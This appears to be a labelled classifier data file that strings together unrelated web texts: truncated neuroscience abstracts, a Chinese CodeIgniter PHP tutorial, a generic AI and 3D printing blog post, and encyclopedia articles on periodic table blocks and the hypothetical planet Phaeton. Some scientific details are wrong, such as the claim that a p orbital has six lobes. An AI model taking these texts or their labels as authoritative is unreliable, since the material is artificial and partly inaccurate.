resonance imaging (fMRI) study investigated human brain regions subserving the discrimination of vibrotactile frequency. An event-related adaptation paradigm was used in which blood-oxygen-level-dependent (BOLD) responses are lower to same compared with different pairs of stimuli (BOLD adaptation). This adaptation effect(More) Successful behavior requires contextual modulation of learned "programs", that is, the retrieval or nonretrieval (inhibition) of behavioral elements depending on situative context. Here we report neural correlates of these elementary aspects of behavior as identified with functional magnetic resonance imaging (fMRI). Inhibition of a "ready-to-go" behavioral(More) Although second-generation antipsychotics are established as the first-line treatment for schizophrenia, female patients are often excluded from this efficient treatment for safety reasons in pregnancy or whilst breastfeeding. For this reason, research on this subject mostly relies on case reports, although there is a great need to establish modern(More)
__label__pos
0.898567
ci快速上手手册-徐多蔚xuduowei整理【原创】 徐多蔚 官方: https://codeigniter.com/ 中国: http://codeigniter.org.cn/ ci: url路径1: index.php/welcome/abc/?id=6 welcome: 控制器名;[默认:welcome] abc: 方法名;  [默认:index] id:表示的是传递给控制器的参数,如 ID 或其它各种变量。 index.php/welcome/abc/?id=6 get接值:$this->input->get(); //得到的get传过来的值,格式是数组。 若是post方式:接收值格式: $this->input->post(); url路径2: example.com/index.php?c=controller&m=function index.php?c=welcome&m=abc 注意:ci中方法参数默认是m,若需要修改,也可以更改的。 application/config/config.php 文件中进行设置,只需将将 enable_query_strings 更改为 TRUE 即可。 $config[‘function_trigger’] = ‘m’;//修改方法参数 ================================================== 提示:我们可以在对应的application\controllers下方创建文件夹比如: index admin 来模拟tp中的“模块” ,ci中如何访问呢? pathinfo模式: index.php/文件夹名/控制器名/方法名 CI中url要么用普通模式,要么用pathinfo模式[推荐使用此模式]【仅同时支持一种!】。 视图的渲染: $this->load->view(‘welcome_message’); view下: welcome_message.php [默认后缀是.php] ================================================ ci框架视图赋值变量 $this->load->vars(“xdw”,array(‘a’=>’1’,’b’=>2,’c’=>3)); $this->load->view(‘abc/hi’); code1: 控制器: $this->load->vars(“xdw”,array(‘a’=>’1’,’b’=>2,’c’=>3)); $this->load->view(‘abc/hi’); 视图引用: <?php  print_r($xdw); ?> code2: 控制器: $this->load->view(‘abc/hi’,array(‘xdw’=>array(‘a’=>’1’,’b’=>2,’c’=>3))); 视图引用: <?php  print_r($xdw); ?> 视图中如何使用自定义函数,以有利于功能扩展? 1、system\helpers 目录下创建一个common_helper.php 文件 2、控制器中需要载入对应的文件。 $this->load->helper(‘common’);//注意是common不是common_helper【系统自动可以识别】 3、视图中就可以直接引用自定义函数了。 提示:如何设置自动载入? application\config\autoload.php 搜索helper $autoload[‘helper’] = array(‘common’); CI 中视图引入JS、CSS文件的方式=========== echo base_url(); //得到项目的目录。 切记必须先载入helper url文件。 $autoload[‘helper’] = array(‘common’,”url”); //url 的2种载入方式: 1、$this->load->helper(‘url’);//手动 2、如何设置自动载入? application\config\autoload.php 搜索helper $autoload[‘helper’] = array(‘url’); 表单提交路径============= $this->load->helper(‘url’);//不能少,也可以在autoload.php中配置好。 用site_url(‘控制器/方法名’);//文件夹名/控制器名/方法名 =========================== 数据库的增、删、改、查 1、确保配置项正常。 application\config\database.php 2、 $this->load->database(); $rst=$this->db->query(“select * from obj_users”); $rs=$rst->result_array();//写法上有多种 foreach($rs as $k){ echo $k[‘username’].”<br/>”; } 提示:$rst->result_array();//把抽象的结果集转换成数组 echo $k[‘username’];       $rs=$rst->result();   //把抽象结果转换成对象     echo $k->username 配置交换表前缀 $db[‘default’][‘dbprefix’] = ‘obj_’; $db[‘default’][‘swap_pre’] = ‘my_’; 那么我们在写sql语句时就用my_这个表前缀,ci会自动把my_换位obj_,所以,dbprefix可以随便修改,方便我们修改数据库名。 如:$sql = “SELECT * FROM my_users”; $rst=$this->db->query($sql); $rst=$this->db->get(表名); $this->db->where(“id=1”); $rst=$this->db->select(“username”)->get(“users”); 删除: $this->load->database(); $num=$this->db->where(“id=14”)->delete(‘users’); //返回的是布尔值true/false; 修改: $this->load->database(); $num=$this->db->where(“id=13”)->update(‘users’,array(“username”=>’xdw’)); var_dump($num);//布尔值 增加: $this->load->database(); $num=$this->db->insert(‘users’,array(“username”=>’xdw666′)); var_dump($num);//布尔值 模型如何载入? 手动: $this->load->model(“m_welcome”);//m_welcome大小写均可,推荐首字母大写。和模型命名一致。 控制器中载入模型的核心源码: $this->load->model(“M_welcome”);//手动下载入指定模型不可省略。 $m=new M_welcome(); $rs=$m->abc(); var_dump($rs); 若我们需要载入指定目录中的模型,demo: $this->load->model(“模型文件夹名称/M_welcome”); 对应的模型的命名建议和控制器名区别开,一般建议在前方加前缀M_ 模型文件的写法: class M_index  extends CI_Model{ //注意:extends CI_Model不能省,否则报错! 自动: 自动载入,在config/autoload.php中配置 $autoload[‘model’] = array(‘m_welcome’); 提示:m_welcome 或者M_welcome均可,推荐首字母大写,这样和模型的命名保持一致。 我们可以在autoload.php中设置自动载入数据库类,这样我们对数据库操作的时候,就可以省略: $this->load->database(); 配置项如下: $autoload[‘libraries’] = array(‘database’); ///session的使用; 使用前都要导入session类,导入方法。 导入session方式一:全局法: config/autoload.php中 $autoload[‘libraries’] = array(“session”); 导入session方式二:页面导入: function __construct(){ parent::__construct();//不可省略 $this->load->library(‘session’); } 使用格式一: 设置: $_SESSION[session名]=值 取的: $_SESSION[session名] 使用格式二: 设置: $this->session->name=值; 取的: $this->session->name; CI框架获取控制器名和方法名 $directory=$this->router->fetch_directory();//目录名 $class = $this->router->fetch_class();//获取控制器名 $method = $this->router->fetch_method();//获取方法名 ================================== 提示:ci中若要模拟tp中公共类的继承。 参考格式如下: @include_once(APPPATH . ‘controllers/admin/Common.php’); class Welcome extends Common { 其中Common.php代码如下: class Common extends CI_Controller { 解说: ci对CI_Controller做了自动包含,但是对其他的没有做自动包含。需要手动include包含类文件。 ================================ 了解下YII框架。 https://www.yiiframework.com/ https://www.yiichina.com/ 关注公众号,了解更多it技术(it问答网 发表评论 电子邮件地址不会被公开。
__label__pos
0.990241
How does AI and 3D printing relate? How does AI and 3D printing relate? Share the Post: Quick Answer: How Does AI and 3D Printing Relate? In today’s technological landscape, artificial intelligence (AI) and 3D printing are two of the most exciting areas of development. Both have the potential to revolutionize the way we live and work, and their relationship is crucial to unlocking their full potential. In this article, we’ll explore the relationship between AI and 3D printing, their definitions, brief history, and applications. We’ll also examine the advantages of using AI and 3D printing together, potential future developments, and their impact on various industries. AI and 3D Printing: What Are They? AI refers to the ability of machines to learn and perform tasks that typically require human intelligence, such as recognizing speech or making decisions. 3D printing, on the other hand, is the process of creating three-dimensional objects from a digital model. The technology involves layering materials until the desired shape is formed. AI has been in development since the 1950s, and 3D printing since the 1980s. Both were initially used in specialized fields such as aerospace and medicine. However, in recent years, their use has expanded to a wide range of industries, including automotive, architecture, fashion, and entertainment. The Relationship between AI and 3D Printing AI and 3D printing work together in various ways. For instance, AI can be used to optimize the design of 3D models, making them more efficient and cost-effective. AI can also be used to analyze data from 3D printing sensors, improving the accuracy and precision of the printing process. Examples of AI and 3D printing applications include the use of AI algorithms to optimize the design of prosthetic limbs and the use of 3D printing to create customized hearing aids. In the automotive industry, AI and 3D printing are used to create lightweight parts that improve fuel efficiency. Advantages of Using AI and 3D Printing Together The combination of AI and 3D printing offers several advantages. Firstly, it is cost-effective and efficient. The use of AI in the design process reduces the need for costly and time-consuming iterations. Secondly, it improves accuracy and precision. The use of AI algorithms in the printing process ensures that the final product meets the desired specifications. Thirdly, it increases speed and customization. The use of 3D printing allows for rapid prototyping and customization of products, while AI speeds up the design process. Potential Future Developments AI and 3D printing technology are rapidly evolving, and there are many potential future developments. For example, AI algorithms could be used to optimize the printing process in real-time, improving efficiency and reducing waste. 3D printing technology could be used to create larger, more complex objects, such as buildings and infrastructure. Conclusion In conclusion, understanding the relationship between AI and 3D printing is crucial for unlocking their full potential. The combination of these technologies offers numerous advantages, including cost-effectiveness, efficiency, accuracy, precision, speed, and customization. As these technologies continue to evolve, we can expect to see even more innovation and growth in various industries. Related Posts Contents Get More Answers, Faster! Stay ahead with our newsletter: swift insights on Web3 and the Creator Economy, plus a free exclusive E-book. Join now! Scroll to Top FREE GUIDE: Unlock the Full Potential of Token Gating For Your Business. In this Free comprehensive Guide You'll learn: Enter your best email 👇 100% FREE 🔒 Your information is 100% secure. 🔒 Skip to content
__label__pos
0.99999
Block (periodic table) From Wikipedia, the free encyclopedia   (Redirected from Periodic table block) Jump to: navigation, search A block of the periodic table of elements is a set of adjacent groups. The term appears to have been first used by Charles Janet.[1] The respective highest-energy electrons in each element in a block belong to the same atomic orbital type. Each block is named after its characteristic orbital; thus, the blocks are: • s-block • p-block • d-block • f-block • g-block (hypothetical) The block names (s, p, d, f and g) are derived from the spectroscopic notation for the associated atomic orbitals: sharp, principal, diffuse and fundamental, and then g which follows f in the alphabet. The following is the order for filling the "subshell" orbitals, according to the Aufbau principle, which also gives the linear order of the "blocks" (as atomic number increases) in the periodic table: 1s, 2s, 2p, 3s, 3p, 4s, 3d, 4p, 5s, 4d, 5p, 6s, 4f, 5d, 6p, 7s, 5f, 6d, 7p, ... For discussion of the nature of why the energies of the blocks naturally appear in this order in complex atoms, see atomic orbital and electron configuration. The "periodic" nature of the filling of orbitals, as well as emergence of the s, p, d and f "blocks" is more obvious, if this order of filling is given in matrix form, with increasing principal quantum numbers starting the new rows ("periods") in the matrix. Then, each subshell (composed of the first two quantum numbers) is repeated as many times as required for each pair of electrons it may contain. The result is a compressed periodic table, with each entry representing two successive elements: Blocks in the periodic table 1s 2s 2p 2p 2p 3s 3p 3p 3p 4s 3d 3d 3d 3d 3d 4p 4p 4p 5s 4d 4d 4d 4d 4d 5p 5p 5p 6s 4f 4f 4f 4f 4f 4f 4f 5d 5d 5d 5d 5d 6p 6p 6p 7s 5f 5f 5f 5f 5f 5f 5f 6d 6d 6d 6d 6d 7p 7p 7p Periodic table[edit] There is an approximate correspondence between this nomenclature of blocks, based on electronic configuration, and groupings of elements based on chemical properties. The s-block and p-block together are usually considered as the main group elements, the d-block corresponds to the transition metals, and the f-block are the lanthanides and the actinides. However, not everyone agrees on the exact membership of each set of elements, so that for example the group 12 elements Zn, Cd and Hg are considered as main group by some scientists and transition metals by others, because they are chemically and physically more similar to the p-block elements than the other d-block elements. Furthermore, the group 3 elements and the f-block are sometimes also considered main group elements due to their similarities to the s-block elements. Groups (columns) in the f-block (between groups 3 and 4) are not numbered. Helium is coloured differently from the p-block elements surrounding it because it is in the s-block, with its outer (and only) electrons in the 1s atomic orbital, although its chemical properties are more similar to the p-block noble gases due to its full shell. In addition to the blocks listed in this table, there is a hypothetical g-block which is not pictured here. The g-block elements can be seen in the expanded extended periodic table. Also, lanthanum and actinium are placed under scandium and yttrium to reflect their status as d-block elements, as they have no electrons in the 4f and 5f orbitals, respectively, while lutetium and lawrencium do.[2] Group → 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ↓ Period 1 1 H 2 He 2 3 Li 4 Be 5 B 6 C 7 N 8 O 9 F 10 Ne 3 11 Na 12 Mg 13 Al 14 Si 15 P 16 S 17 Cl 18 Ar 4 19 K 20 Ca 21 Sc 22 Ti 23 V 24 Cr 25 Mn 26 Fe 27 Co 28 Ni 29 Cu 30 Zn 31 Ga 32 Ge 33 As 34 Se 35 Br 36 Kr 5 37 Rb 38 Sr 39 Y 40 Zr 41 Nb 42 Mo 43 Tc 44 Ru 45 Rh 46 Pd 47 Ag 48 Cd 49 In 50 Sn 51 Sb 52 Te 53 I 54 Xe 6 55 Cs 56 Ba 57 La 1 asterisk 72 Hf 73 Ta 74 W 75 Re 76 Os 77 Ir 78 Pt 79 Au 80 Hg 81 Tl 82 Pb 83 Bi 84 Po 85 At 86 Rn 7 87 Fr 88 Ra 89 Ac 1 asterisk 104 Rf 105 Db 106 Sg 107 Bh 108 Hs 109 Mt 110 Ds 111 Rg 112 Cn 113 Nh 114 Fl 115 Mc 116 Lv 117 Ts 118 Og 1 asterisk 58 Ce 59 Pr 60 Nd 61 Pm 62 Sm 63 Eu 64 Gd 65 Tb 66 Dy 67 Ho 68 Er 69 Tm 70 Yb 71 Lu 1 asterisk 90 Th 91 Pa 92 U 93 Np 94 Pu 95 Am 96 Cm 97 Bk 98 Cf 99 Es 100 Fm 101 Md 102 No 103 Lr s-block[edit] The s-block is on the left side of the periodic table and includes elements from the first two columns, the alkali metals (group 1) and alkaline earth metals (group 2), plus helium. Helium is a controversial element for the scientists as it can be placed in the second group of s block as well as the 18th group of p-block, but most scientists consider it to rest at the top of group 18 i.e. above neon (atomic number 10) as it has many properties similar to the group 18 elements. Most s-block elements are highly reactive metals due to the ease with which their outer s-orbital electrons interact to form compounds. The first period elements in this block, however, are nonmetals. Hydrogen is highly chemically reactive, like the other s-block elements, but helium is a virtually unreactive noble gas. S-block elements are unified by the fact that their valence electrons (outermost electrons) are in the s orbital. The s-orbital is a single spherical cloud which can contain only one pair of electrons; hence, the s-block consists of only two columns in the periodic table. Elements in column 1, with a single s-orbital valence electron, are the most reactive of the block. Elements in the second column have two s-orbital valence electrons, and, except for helium, are only slightly less reactive. p-block[edit] The p-block is on the right side of the periodic table and includes elements from the six columns beginning with column 13 and ending with column 18. Helium, though being in the top of group 18, is not included in the p-block. The p-block is home to the biggest variety of elements and is the only block that contains all three types of elements: metals, nonmetals, and metalloids. Generally, the p-block elements are best described in terms of element type or group. P-block elements are unified by the fact that their valence electrons (outermost electrons) are in the p orbital. The p orbital consists of six lobed shapes coming off a central point at evenly spaced angles. The p orbital can hold a maximum of six electrons, hence there are six columns in the p-block. Elements in column 13, the first column of the p-block, have one p-orbital electron. Elements in column 14, the second column of the p-block, have two p-orbital electrons. The trend continues this way until we reach column 18, which has six p-orbital electrons. Metals[edit] P-block metals have classic metal characteristics: they are shiny, they are good conductors of heat and electricity, and they lose electrons easily. Generally, these metals have high melting points and readily react with nonmetals to form ionic compounds. Ionic compounds form when a positive metal ion bonds with a negative nonmetal ion. Of the p-block metals, several have fascinating properties. Gallium, in the 3rd row of column 13, is a metal that can melt in the palm of a hand. Tin, in the fourth row of column 14, is an abundant, flexible, and extremely useful metal. It is an important component of many metal alloys like bronze, solder, and pewter. Sitting right beneath tin is lead, a toxic metal. Ancient people used lead for a variety of things, from food sweeteners to pottery glazes to eating utensils. It has been suspected that lead poisoning is related to the fall of Roman civilization,[3] but further research has shown this to be unlikely.[4][5] For a long time, lead was used in the manufacturing of paints. It was only within the last century that lead paint use has been restricted due to its toxic nature. Metalloids[edit] Metalloids have properties of both metals and nonmetals, but the term 'metalloid' lacks a strict definition. All of the elements that are commonly recognized as metalloids are in the p-block: boron, silicon, germanium, arsenic, antimony, and tellurium. Metalloids tend to have lower electrical conductivity than metals, yet often higher than nonmetals. They tend to form chemical bonds similarly to nonmetals, but may dissolve in metallic alloys without covalent or ionic bonding. Metalloid additives can improve properties of metallic alloys, sometimes paradoxically to their own apparent properties. Some may give a better electrical conductivity, higher corrosion resistance, ductility, or fluidity in molten state, etc. to the alloy. Boron has many carbon-like properties, but is very rare. It has many uses, for example a P type semiconductor dopant. Silicon is perhaps the most famous metalloid. It is the second most abundant element in Earth's crust and one of the main ingredients in glass. It is used to make semiconductor circuits, from large power switches and high current diodes to microchips for computers and other electronic devices. It is also used in certain metallic alloys, e.g. to improve casting properties of alumimium. So valuable is silicon to the technology industry that Silicon Valley in California is named after it. Germanium has properties very similar to silicon, yet this element is much more rare. It was once used for its semiconductor properties pretty much as silicon is now, and it has some superior properties at that, but is now a rare material in the industry. Arsenic is a toxic metalloid that has been used throughout history as an additive to metal alloys, paints, and even makeup. Antimony is used as a constituent in casting alloys such as printing metal. • Not always considered as metalloids: • Carbon, in the same column with silicon and germanium, electrically fairly conductive unlike most other nonmetals, and to an extent preferred as a trace constituent in certain metallic alloys such as steel • Phosphorus has metallurgical uses among others, e.g. a constituent of some copper alloys • Selenium, once used as a semiconductor material, and also used to improve properties of metallic alloys • Aluminium is generally considered a metal, but it has some metalloid/non-metal properties such as negative oxidation states • Polonium Noble gases[edit] Previously called inert gases, their name was changed as there are a few other gases that are inert but not noble gases, such as nitrogen. The noble gases are located in the far right column of the periodic table, also known as Group Zero or Group Eighteen. Noble gases are also called as aerogens but this nomenclature of the group is not officially accepted by the IUPAC. All of the noble gases have full outer shells with eight electrons. However, at the top of the noble gases is helium, with a shell that is full with only two electrons. The fact that their outer shells are full means they rarely react with other elements, which led to their original title of "inert." Because of their chemical properties, these gases are also used in the laboratory to help stabilize reactions that would usually proceed too quickly. As the atomic numbers increase, the elements become rarer. They are not just rare in nature, but rare as useful elements, too. • Helium is best known for its low density, used to safely produce buoyancy for zeppelins and balloons • Neon is notorious as the red to yellow glow medium of old low power signal lamps and signs • Argon is used as a protective gas in MIG and TIG welding • Xenon is used as a plasma medium in high intensity arc lamps with tungsten electrodes. Automotive xenon lights, however, are mostly mercury vapor bulbs with low pressure xenon to help striking the arc and producing light instantly. • Krypton has many uses like arc flash medium. Krypton filled incandescent bulbs were once the most efficient variety, before being replaced by halogen technology. • Radon is radioactive, and one of the densest elements to remain in gas state at room temperature Halogens[edit] The second column from the right side of the periodic table, group 17, is the halogen family of elements. These elements are all just one electron shy of having full shells. Because they are so close to being full, they have the trait of combining with many different elements and are very reactive. They are often found bonding with metals and elements from Group One, as these elements in each have one electron. Not all halogens react with the same intensity. Fluorine is the most reactive and combines with most elements from around the periodic table. As with other columns, reactivity decreases as the atomic number increases. When a halogen combines with another element, the resulting compound is called a halide. One of the best examples of a halide is sodium chloride (NaCl). d-block[edit] The d-block is on the middle of the periodic table and includes elements from columns 3 through 12. These elements are also known as the transition metals because they show a transitivity in their properties i.e. they show a trend in their properties in simple incomplete d orbitals. Transition basically means d orbital lies between s and p orbitals and shows a transition from properties of s to p. The d-block elements are all metals which exhibit two or more ways of forming chemical bonds. Because there is a relatively small difference in the energy of the different d-orbital electrons, the number of electrons participating in chemical bonding can vary. This results in the same element exhibiting two or more oxidation states, which determines the type and number of its nearest neighbors in chemical compounds. D-block elements are unified by having in their outermost electrons one or more d-orbital electrons but no p-orbital electrons. The d-orbitals can contain up to five pairs of electrons; hence, the block includes ten columns in the periodic table. f-block[edit] The f-block is in the center-left of a 32-column periodic table but in the footnoted appendage of 18-column tables. These elements are not generally considered as part of any group. They are often called inner transition metals because they provide a transition between the s-block and d-block in the 6th and 7th row (period), in the same way that the d-block transition metals provide a transitional bridge between the s-block and p-block in the 4th and 5th rows. The known f-block elements come in two series, the lanthanides of period 6 and the radioactive actinides of period 7. All are metals. Because the f-orbital electrons are less active in determining the chemistry of these elements, their chemical properties are mostly determined by outer s-orbital electrons. Consequently, there is much less chemical variability within the f-block than within the s-, p-, or d-blocks. F-block elements are unified by having one or more of their outermost electrons in the f-orbital but none in the d-orbital or p-orbital. The f-orbitals can contain up to seven pairs of electrons; hence, the block includes fourteen columns in the periodic table. g-block[edit] The g-block is a hypothetical block of elements in the extended periodic table whose outermost electrons are posited to have one or more g-orbital electrons but no f-, d- or p-orbital electrons. References[edit] 1. ^ Charles Janet, La classification hélicoïdale des éléments chimiques, Beauvais, 1928 2. ^ Lavelle, Laurence. "Lanthanum (La) and Actinium (Ac) Should Remain in the d-Block" (PDF). lavelle.chem.ucla.edu. Retrieved 9 November 2014.  3. ^ Wilford, John Noble (17 March 1983). "ROMAN EMPIRE'S FALL IS LINKED WITH GOUT AND LEAD POISONING". The New York Times. Retrieved 19 January 2016.  4. ^ Killgrove, Kristina (20 January 2012). "Lead Poisoning in Rome - The Skeletal Evidence". Powered by Osteons. Retrieved 19 January 2016.  5. ^ Sumner, Thomas (21 April 2014). "Did Lead Poisoning Bring Down Ancient Rome?". Science Magazine. Retrieved 19 January 2016. 
__label__pos
0.939904
@PluginTestStep Applies to ReadyAPI 3.41, last modified on September 23, 2022 PluginTestStep creates a custom test step to be used with functional tests. It is usually combined with @PluginPanelBuilder to allow for configuration of the step. Property Description typeName An internal id to uniquely identify this test step type. name A verbal name of the type of the test step. description The description of what it does. iconPath An icon to be shown in the toolbar. Optional, but recommended. The annotated class must implement the TestStep interface (and, usually, extends WsdlTestStepWithProperties). Sample Test Step package com.smartbear.ready.plugin.template.factories; import com.eviware.soapui.config.TestStepConfig; import com.eviware.soapui.impl.wsdl.testcase.WsdlTestCase; import com.eviware.soapui.impl.wsdl.TestSteps.WsdlTestStepResult; import com.eviware.soapui.impl.wsdl.TestSteps.WsdlTestStepWithProperties; import com.eviware.soapui.model.testsuite.TestCaseRunContext; import com.eviware.soapui.model.testsuite.TestCaseRunner; import com.eviware.soapui.model.testsuite.TestStepResult; import com.eviware.soapui.plugins.auto.PluginTestStep; /** * */ @PluginTestStep(typeName = "SampleTestStep", name = "Sample TestStep", description = "A sample TestStep") public class SampleTestStep extends WsdlTestStepWithProperties { public SampleTestStep(WsdlTestCase testCase, TestStepConfig config, boolean forLoadTest) { super(testCase, config, false, forLoadTest); } @Override public TestStepResult run(TestCaseRunner testRunner, TestCaseRunContext testRunContext) { WsdlTestStepResult result = new WsdlTestStepResult(this); result.addMessage("Message"); return result; } } Highlight search results
__label__pos
0.584315
Phaeton (hypothetical planet) From Wikipedia, the free encyclopedia Jump to navigation Jump to search Phaeton (alternatively Phaethon or Phaëton) (/ˈf.əθən/; Ancient Greek: Φαέθων, romanizedPhaéthōn, pronounced [pʰa.é.tʰɔːn]) was the hypothetical planet hypothesized by the Titius–Bode law to have existed between the orbits of Mars and Jupiter, the destruction of which supposedly led to the formation of the asteroid belt (including the dwarf planet Ceres). The hypothetical planet was named for Phaethon, the son of the sun god Helios in Greek mythology, who attempted to drive his father's solar chariot for a day with disastrous results and was ultimately destroyed by Zeus.[1] However, his name was used historically for Jupiter itself as well.[2] Phaeton hypothesis[edit] Sturz des Phaeton (Fall of the Phaeton) by Johann Michael Franz Heinrich Wilhelm Matthäus Olbers, who formulated the planet Phaeton hypothesis According to the hypothesized Titius–Bode law, a planet was believed to exist between Mars and Jupiter. After learning of the regular sequence discovered by the German astronomer and mathematician J.D. Titius (1729–1796), astronomer Johann E. Bode urged a search for the fifth planet corresponding to a gap in the sequence. (1) Ceres, the largest asteroid in the asteroid belt (now considered a dwarf planet), was serendipitously discovered in 1801 by the Italian Giuseppe Piazzi and found to closely match the "empty" position in Titius' sequence, which led many to believe it to be the "missing planet". However, in 1802 astronomer Heinrich Wilhelm Matthäus Olbers discovered and named the asteroid (2) Pallas, a second object in roughly the same orbit as (1) Ceres. Olbers proposed that these two discoveries were the fragments of a disrupted planet that had formerly orbited the Sun, and predicted that more of these pieces would be found. The discovery of the asteroid (3) Juno by Karl Ludwig Harding and (4) Vesta by Olbers, buttressed his hypothesis. In 1823, German linguist and retired teacher Johann Gottlieb Radlof [de] called Olbers' destroyed planet Phaëthon, linking it to the Greek myths and legends about Phaethon and others.[3] In 1927, Franz Xaver Kugler wrote a short book titled Sibyllinischer Sternkampf und Phaëthon in naturgeschichtlicher Beleuchtung (The Sybilline Battle of the Stars and Phaeton Seen as Natural History).[4][5] The central idea in Kugler's book is that the myth of Phaethon was based on a real event: Making use of ancient sources, Kugler argued that Phaeton had been a very bright celestial object that appeared around 1500 BC which fell to Earth not long afterwards as a shower of large meteorites, causing catastrophic fires and floods in Africa and elsewhere.[citation needed] Hypotheses regarding the formation of the asteroid belt from the destruction of a hypothetical fifth planet are today collectively referred to as "the disruption theory". These hypotheses state that there was once a major planetary member of the Solar System circulating in the present gap between Mars and Jupiter, which was destroyed by one or more of the following hypothetical processes:[citation needed] • it veered too close to Jupiter and was torn apart by its powerful tides • it was struck by another large celestial body • it was destroyed by a hypothetical brown dwarf, the companion star to the Sun, known as Nemesis • it was shattered by some internal catastrophe In 1953, Soviet Russian astronomer Ivan I. Putilin suggested that Phaeton was destroyed due to centrifugal forces, giving it a diameter of approximately 6,880 kilometers (slightly larger than Mars' diameter of 6,779 km) and a rotational speed of 2.6 hours. Eventually, the planet became so distorted that parts of it near its equator were spun off into space. Outgassing of gases once stored in Phaeton's interior caused multiple explosions, sending material into space and forming asteroid families. However, his theory was not widely accepted. Two years later in 1955, Odessan astronomer Konstantin N. Savchenko suggested that Ceres, Pallas, Juno, and Vesta were not fragments of Phaeton, but rather its former moons. Phaeton had an additional fifth satellite, assumed to be the size of Ceres, orbiting near the planet's Hill sphere, and thus more subject to gravitational perturbations from Jupiter. As a result, the fifth satellite became tidally detached and orbited the Sun for millions of years afterward, making periodic close misses with Phaeton that slowly increased its velocity. Once the escaped satellite re-entered Phaeton's Hill sphere, it collided with the planet at high speed, shattering it while Ceres, Pallas, Juno, and Vesta assumed heliocentric orbits. Simulations showed that for such a Ceres-sized body to shatter Phaeton, it would need to be travelling at nearly 20 kilometers per second.[6] The disrupted planet hypothesis has also been supported by French-Italian mathematician and astronomer Joseph-Louis Lagrange in 1814;[7] Canadian geologist Reginald Daly in 1943;[8] American geochemists Harrison Brown and Clair Patterson in 1948;[9] Soviet academics Alexander Zavaritskiy in 1948, Vasily Fesenkov in 1950 (who later rejected his own model) and Otto Schmidt (died 1956);[6] British-Canadian astronomer Michael Ovenden in 1972-3;[10][11] and American astronomer Donald Menzel in 1978.[12] Ovenden suggested that the planet be named "Krypton" after the destroyed native world of Superman, as well as believing it to have been a gas giant roughly eighty-five to ninety Earth masses in mass and nearly the size of Saturn.[10] Today, the Phaeton hypothesis has been superseded by the accretion model.[13] Most astronomers today believe that the asteroids in the main belt are remnants of the protoplanetary disk that never formed a planet, and that in this region the amalgamation of protoplanets into a planet was prevented by the disruptive gravitational perturbations of Jupiter during the formative period of the Solar System.[citation needed] Other hypotheses[edit] Some scientists and non-scientists continue to advocate for the existence and destruction of a Phaeton-like planet. Zecharia Sitchin suggested that the goddess known to the Sumerians as Tiamat in fact relates to a planet that was destroyed by a rogue planet known as Nibiru, creating both Earth and the asteroid belt.[14] His work is widely regarded as pseudoscience.[15] The astronomer and author Tom Van Flandern held that Phaeton (which he called "Planet V", with V representing the Roman numeral for five and not to be confused with the other postulated former fifth planet not attributed to the formation of the asteroid belt) exploded through some internal mechanism. In his "Exploded Planet Hypothesis 2000", he lists possible reasons for its explosion: a runaway nuclear reaction of uranium in its core, a change of state as the planet cooled down creating a density phase change, or through continual absorption of heat in the core from gravitons. Van Flandern even suggested that Mars itself may have been a moon of Planet V, due to its craters hinting to exposure to meteorite storms and its relatively low density compared to the other inner planets.[16][17][18] In 1972, Soyuzmultfilm studios produced an animated short film titled Phaeton: The Son of Sun (Russian: Фаэтон - Сын Солнца), directed by Vasiliy Livanov, in which the asteroid belt is portrayed as the remains of a planet. The film also has numerous references to ancient astronauts.[19] Phaeton in literature[edit] Several works of fiction feature a supposed planet (sometimes named Phaeton or Maldek) existing in the past between the orbits of Mars and Jupiter, which somehow became the Solar System's asteroid belt. See also[edit] Sources[edit] References[edit] 1. ^ Chisholm, Hugh, ed. (1911). "Phaëthon" . Encyclopædia Britannica. Vol. 21 (11th ed.). Cambridge University Press. p. 342. 2. ^ Cicero, De Natura Deorum. 3. ^ Radlof, Johann Gottlieb (1823). Zertrümmerung der großen Planeten Hesperus und Phaeton, und darauf folgenden Zerstörungen und Ueberflutung auf der Erde. Berlin: G. Reimer. p. 59. 4. ^ Kugler, Franz Xaver (1927). Sibyllinischer Sternkampf und Phaëthon in naturgeschichtlicher Beleuchtung [The Sybilline Battle of the Stars and Phaeton Seen as Natural History]. archive.org (in German).[full citation needed] 5. ^ "Sybilline Battle of the Stars". anticariateleph.ro.[full citation needed] 6. ^ a b Bronshten, V.A. (May 1972). Origin of the Asteroids. Zemlya i Vselennaya. Retrieved 22 March 2017. 7. ^ Lagrange, J.L. (1814). Sur l'origine des comètes-Connaissance des temps pour l'an 1814. p. 211. 8. ^ Dodd, Robert (1986). Thunderstones and Shooting Stars. Harvard U. Press. p. 54. 9. ^ Brown, H.; Patterson, C. (1948). "The composition of meteoritic matter III". J. Geol. 56: 85–111. doi:10.1086/625489. S2CID 128626943. 10. ^ a b Ovenden, M.W. (1972). "Bode's law and the missing planet". Nature. 239: 508–509. doi:10.1038/239508a0. S2CID 30520852. 11. ^ Ovenden, M.W. (1973). "Planetary Distances and the Missing Planet". Recent Advances in Dynamic Astronomy. Reidel. pp. 319–332.[full citation needed] 12. ^ Menzel, Donald (1978). Guide des Etoiles et Planètes [A Field Guide to the Stars and Planets]. Les Guides du Naturaliste. Translated by Egger, M.; Egger, F. (2me éd. ed.). Paris: Delachaux et Nestlé; Houghton-Mifflin. p. 315. Presque toutes ces petites planètes circulent entre les orbites de Mars et Jupiter. On admet qu'elles représentent les fragments dispersés d'une grande planète qui se serait désintégrée [inter alia] 13. ^ "Ask an Astrophysicist". imagine.gsfc.nasa.gov. Archived from the original on 2 November 2014. 14. ^ Sitchin, Zecharia (1990). "Chapter 2: It Came From Outer Space". Genesis Revisited. New York: Avon Books. ISBN 978-0380761593. 15. ^ Carroll, Robert T. (1994–2009). "Zecharia Sitchin and The Earth Chronicles". The Skeptic's Dictionary. John Wiley & Sons. Retrieved 5 February 2016. 16. ^ Van Flandern, Tom C. (2000). "The Exploded Planet Hypothesis 2000". Meta Research. Archived from the original on 2002-11-21. 17. ^ Van Flandern, Tom C. (2007). "The challenge of the exploded planet hypothesis". International Journal of Astrobiology. 6 (3): 185–197. Bibcode:2007IJAsB...6..185V. doi:10.1017/S1473550407003758. ISSN 1473-5504. S2CID 123543022. 18. ^ Van Flandern, Tom C. (1999). Dark Matter, Missing Planets, and New Comets: Paradoxes resolved, origins illuminated. North Atlantic Books. ISBN 9781556432682. 19. ^ Российская анимация в буквах и фигурах | Фильмы | «ФАЭТОН - СЫН СОЛНЦА» Books[edit] External links[edit]
__label__pos
0.833489
